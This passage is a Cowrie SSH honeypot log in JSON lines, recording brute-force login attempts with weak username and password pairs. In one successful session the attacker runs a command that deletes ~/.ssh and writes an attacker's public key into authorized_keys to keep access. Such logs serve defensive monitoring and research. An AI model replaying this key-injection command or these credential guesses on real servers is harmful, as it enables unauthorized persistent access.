{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:49:01.994483Z","src_ip":"212.227.235.229","session":"055fbae7f03f"}
{"eventid":"cowrie.login.failed","username":"solana","password":"Solana","message":"login attempt [solana/Solana] failed","sensor":"my-vps","timestamp":"2025-08-28T17:49:02.311376Z","src_ip":"212.227.235.229","session":"055fbae7f03f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:03.419185Z","src_ip":"212.227.235.229","session":"055fbae7f03f"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":57150,"dst_ip":"1.2.3.4","dst_port":22,"session":"a772907ac5e9","protocol":"ssh","message":"New connection: 171.243.150.185:57150 (1.2.3.4:22) [session: a772907ac5e9]","sensor":"my-vps","timestamp":"2025-08-28T17:49:14.698490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:49:14.702941Z","src_ip":"171.243.150.185","session":"a772907ac5e9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:49:15.822991Z","src_ip":"171.243.150.185","session":"a772907ac5e9"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T17:49:19.820906Z","src_ip":"171.243.150.185","session":"a772907ac5e9"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:21.035503Z","src_ip":"171.243.150.185","session":"a772907ac5e9"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":37768,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a7a969fe9ab","protocol":"ssh","message":"New connection: 199.195.253.95:37768 (1.2.3.4:22) [session: 5a7a969fe9ab]","sensor":"my-vps","timestamp":"2025-08-28T17:49:47.346699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:49:47.354396Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:49:47.533730Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd@2024","message":"login attempt [root/P@ssw0rd@2024] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:49:48.191812Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:49:48.572205Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:49:48.573132Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:49:48.574362Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:48.750109Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:49:49.564393Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T17:49:49.565060Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T17:49:49.768700Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:49.769758Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":38812,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd207f23fa07","protocol":"ssh","message":"New connection: 199.195.253.95:38812 (1.2.3.4:22) [session: bd207f23fa07]","sensor":"my-vps","timestamp":"2025-08-28T17:49:49.942132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:49:49.964022Z","src_ip":"199.195.253.95","session":"bd207f23fa07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:49:50.171765Z","src_ip":"199.195.253.95","session":"bd207f23fa07"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T17:49:51.100143Z","src_ip":"199.195.253.95","session":"bd207f23fa07"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:52.242768Z","src_ip":"199.195.253.95","session":"bd207f23fa07"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":39738,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ae9c0c6b8a1","protocol":"ssh","message":"New connection: 199.195.253.95:39738 (1.2.3.4:22) [session: 1ae9c0c6b8a1]","sensor":"my-vps","timestamp":"2025-08-28T17:49:52.385318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:49:52.390874Z","src_ip":"199.195.253.95","session":"1ae9c0c6b8a1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:49:52.546407Z","src_ip":"199.195.253.95","session":"1ae9c0c6b8a1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:49:53.108056Z","src_ip":"199.195.253.95","session":"1ae9c0c6b8a1"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:53.250758Z","src_ip":"199.195.253.95","session":"5a7a969fe9ab"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:53.251729Z","src_ip":"199.195.253.95","session":"1ae9c0c6b8a1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:53.252717Z","src_ip":"176.65.149.186","session":"47a6bc2a1f25"}
{"eventid":"cowrie.session.closed","duration":180.06049633026123,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:49:53.256451Z","src_ip":"176.65.149.186","session":"47a6bc2a1f25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49394,"dst_ip":"1.2.3.4","dst_port":22,"session":"20d5430446c9","protocol":"ssh","message":"New connection: 212.227.125.160:49394 (1.2.3.4:22) [session: 20d5430446c9]","sensor":"my-vps","timestamp":"2025-08-28T17:50:04.902721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:50:04.968617Z","src_ip":"212.227.125.160","session":"20d5430446c9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:50:06.059642Z","src_ip":"212.227.125.160","session":"20d5430446c9"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T17:50:14.399238Z","src_ip":"212.227.125.160","session":"20d5430446c9"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:50:16.128799Z","src_ip":"212.227.125.160","session":"20d5430446c9"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":50102,"dst_ip":"1.2.3.4","dst_port":22,"session":"d722cbbede3b","protocol":"ssh","message":"New connection: 171.243.150.185:50102 (1.2.3.4:22) [session: d722cbbede3b]","sensor":"my-vps","timestamp":"2025-08-28T17:50:28.951418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:50:29.013266Z","src_ip":"171.243.150.185","session":"d722cbbede3b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zl